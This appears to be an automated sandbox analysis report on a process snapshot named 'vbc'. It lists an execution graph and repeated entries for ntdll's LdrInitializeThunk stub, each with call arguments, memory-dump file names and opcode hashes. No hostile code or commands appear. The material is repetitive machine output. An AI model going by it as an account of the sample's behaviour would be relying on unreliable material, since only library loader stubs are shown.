                                                                                                                                                  Total number of Nodes:38
                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                  execution_graph 61718 5612c00 61720 5612c0a 61718->61720 61721 5612c11 61720->61721 61722 5612c1f LdrInitializeThunk 61720->61722 61723 561096e 61724 56109a8 ___swprintf_l 61723->61724 61726 5610ed3 __startOneArgErrorHandling 61724->61726 61751 5612df0 LdrInitializeThunk 61724->61751 61727 5610a15 __except_handler4 61727->61726 61752 5612df0 LdrInitializeThunk 61727->61752 61729 5610a6c 61729->61726 61753 5610f04 LdrInitializeThunk __startOneArgErrorHandling __except_handler4 61729->61753 61731 5610a81 61731->61726 61732 5610a8b GetPEB 61731->61732 61733 5610ac5 61732->61733 61733->61726 61754 561171c 61733->61754 61735 5610ae9 61736 5649837 61735->61736 61740 5610b03 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 61735->61740 61748 5610e0f ___swprintf_l 61735->61748 61761 5612ad0 LdrInitializeThunk 61736->61761 61738 5610ec2 GetPEB 61738->61726 61741 5610bbb GetPEB 61740->61741 61742 5610ddb __cftof 61740->61742 61741->61742 61745 5610be7 __cftof 61741->61745 61764 5610fa6 GetPEB GetPEB LdrInitializeThunk 61742->61764 61743 5610f02 61743->61738 61745->61742 61762 56113c5 20 API calls 2 library calls 61745->61762 61747 5649b56 61748->61738 61748->61743 61748->61747 61760 5612b60 LdrInitializeThunk 61748->61760 61749 5610ce6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 61749->61742 61763 56110ee 7 API calls 2 library calls 61749->61763 61751->61727 61752->61729 61753->61731 61755 561175b __except_handler4 61754->61755 61756 56117e5 61755->61756 61765 5612fe0 LdrInitializeThunk 61755->61765 61766 55e3c70 GetPEB 61756->61766 61759 5611830 __startOneArgErrorHandling 61759->61735 61760->61743 61761->61748 61762->61749 61763->61742 61764->61748 61765->61756 61766->61759 61771 5612bf0 LdrInitializeThunk

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 05612C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 5612c0a-5612c0f 1 5612c11-5612c18 0->1 2 5612c1f-5612c26 LdrInitializeThunk 0->2
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0562FD4F,000000FF,00000024,056C6634,00000004,00000000,?,-00000018,7D810F61,?,?,055E8B12,?,?,?,?), ref: 05612C24
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
                                                                                                                                                  • Instruction ID: 3aba54842acf319366314c0d3799dd2e6f10e70ac56bfcb6258b580e9cf80a8f
                                                                                                                                                  • Opcode Fuzzy Hash: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
                                                                                                                                                  • Instruction Fuzzy Hash: BCB09B729019D5C6DA51E7604A09B27791177D0701F59C061D3030795F4B38C1D1E575
                                                                                                                                                  Function 05612D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 10 5612d30-5612d3c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(055FA52A,000000FF,?,056C67F8,056AC9A0,00000020,055FA460,056C689C,00000000,0000001D,?,052E2AA0), ref: 05612D3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
                                                                                                                                                  • Instruction ID: 4aff3bfa65f7d461aafec5dbbc53c77b9067847115ffbe3214fc39644375951d
                                                                                                                                                  • Opcode Fuzzy Hash: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
                                                                                                                                                  • Instruction Fuzzy Hash: 7090022230191003D140755858596064015D7E1301F95D011E0414758DDD1589569622
                                                                                                                                                  Function 05612D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 9 5612d10-5612d1c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0565B508,00000004,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 05612D1A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
                                                                                                                                                  • Instruction ID: eb87f1749cceb672a33db9a22042a3fa65ca5b1f630e4307a94a4b6eb9525310
                                                                                                                                                  • Opcode Fuzzy Hash: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
                                                                                                                                                  • Instruction Fuzzy Hash: FF90022A21391002D1807558584960A001587D1202FD5D415A001575CDCD1589699721
                                                                                                                                                  Function 05612DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 12 5612df0-5612dfc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0565B05B,00000073,?,00000008,00000000,000000FF,00000004), ref: 05612DFA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                                                                                                  • Instruction ID: 5e137bf6e0f84ae1d0f88f385d1b493d9caa7acd8c0056b2961ad9ebc1fd996a
                                                                                                                                                  • Opcode Fuzzy Hash: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                                                                                                  • Instruction Fuzzy Hash: 1890023220191413D11175584945707001987D0241FD5C412A042475CE9E568A52E521
                                                                                                                                                  Function 05612DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 11 5612dd0-5612ddc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(056291A3,00000000,00000000,?,?,?,055D8A1A,056AC2B0,00000018,055C8873), ref: 05612DDA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
                                                                                                                                                  • Instruction ID: bd169d920dd447858d0a510398d34fb190ede29e5b8b5bf36533c16dc135c1f9
                                                                                                                                                  • Opcode Fuzzy Hash: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
                                                                                                                                                  • Instruction Fuzzy Hash: 15900222242951525545B5584845507401697E02417D5C012A1414B54D8D269956DA21
                                                                                                                                                  Function 05612C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 7 5612c70-5612c7c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(055CFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,05627BE5,00001000,00004000,000000FF,?,00000000), ref: 05612C7A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                                                                                                  • Instruction ID: b6bde56269cf1e6d8a64afd89c4d6299ff91fb68fbc2c33da7a70cb5c557ade3
                                                                                                                                                  • Opcode Fuzzy Hash: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                                                                                                  • Instruction Fuzzy Hash: 9990023220199802D1107558884574A001587D0301F99C411A442475CE8E958991B521
                                                                                                                                                  Function 05612CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 8 5612ca0-5612cac LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(055F3999,000000FA,00000001,?,00000050,?,?), ref: 05612CAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
                                                                                                                                                  • Instruction ID: a88b289c717752f80b17e5d1d9874faff1a95cbdb05e8cbc05772e2a7d1dbc20
                                                                                                                                                  • Opcode Fuzzy Hash: b8b49422fbffe0e38e4141565c0082c729060a39d7094937129336b1b0fc5edf
                                                                                                                                                  • Instruction Fuzzy Hash: 1A90023220191402D10079985849646001587E0301F95D011A5024759FCE658991A531
                                                                                                                                                  Function 05612F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 15 5612f30-5612f3c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(055FE6D9,01000000,0000000D,00000000,00000000,00000010,01000000,?,?,?,00100021,00000018,?,00000005,00000060,?), ref: 05612F3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
                                                                                                                                                  • Instruction ID: 0b4027c2bbc2711004137ba6ede9821ea0a3fff8578dee150c559111694d20d1
                                                                                                                                                  • Opcode Fuzzy Hash: 2aa298fb206c5309967782f0b869ad75e138cb4ce3f4c6cd00bd450f79e84f78
                                                                                                                                                  • Instruction Fuzzy Hash: F490026234191442D10075584855B060015C7E1301F95C015E1064758E8E19CD52A526
                                                                                                                                                  Function 05612FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(056117E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 05612FEA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
                                                                                                                                                  • Instruction ID: 23b96d374db3f378100053bf7261721a7c9d4e04aa8a797630bbe029191a7a36
                                                                                                                                                  • Opcode Fuzzy Hash: eb90f19e970fa5c494c46ade000821050d2904709c2b890d85fbde49cd2fe1de
                                                                                                                                                  • Instruction Fuzzy Hash: F3900222211D1042D20079684C55B07001587D0303F95C115A0154758DCD1589619921
                                                                                                                                                  Function 05612FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 17 5612fb0-5612fbc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(056105E3,00000000,00000000,00000001,00000000,00000000,00000000,?,05612380,056103B6,00000000,00000000,?,00000000,?), ref: 05612FBA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
                                                                                                                                                  • Instruction ID: 05862714357635e9c1cb0c91b126b033be53e163a3601644bfd1f21e35fd33b8
                                                                                                                                                  • Opcode Fuzzy Hash: 208377d0bfc5c36ca7a637b2f4d15bcae78e35ef7f260c6a7364060fcfea7a0a
                                                                                                                                                  • Instruction Fuzzy Hash: 9890022260191042414075688C859064015ABE1211795C121A0998754E8D5989659A65
                                                                                                                                                  Function 05612F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 16 5612f90-5612f9c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0564CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 05612F9A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                                                                                                  • Instruction ID: e0f0138333b4f34750f928d71d950f521013dc64113540cac58ee97a31371ad8
                                                                                                                                                  • Opcode Fuzzy Hash: 54ceaf8607d774ac2e96035f180cc56e7eb3fea5f69ac78aaa54c14ebebb83cd
                                                                                                                                                  • Instruction Fuzzy Hash: 67900232201D1402D10075584C5570B001587D0302F95C011A1164759E8E258951A971
                                                                                                                                                  Function 05612EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 14 5612ea0-5612eac LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05631B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 05612EAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
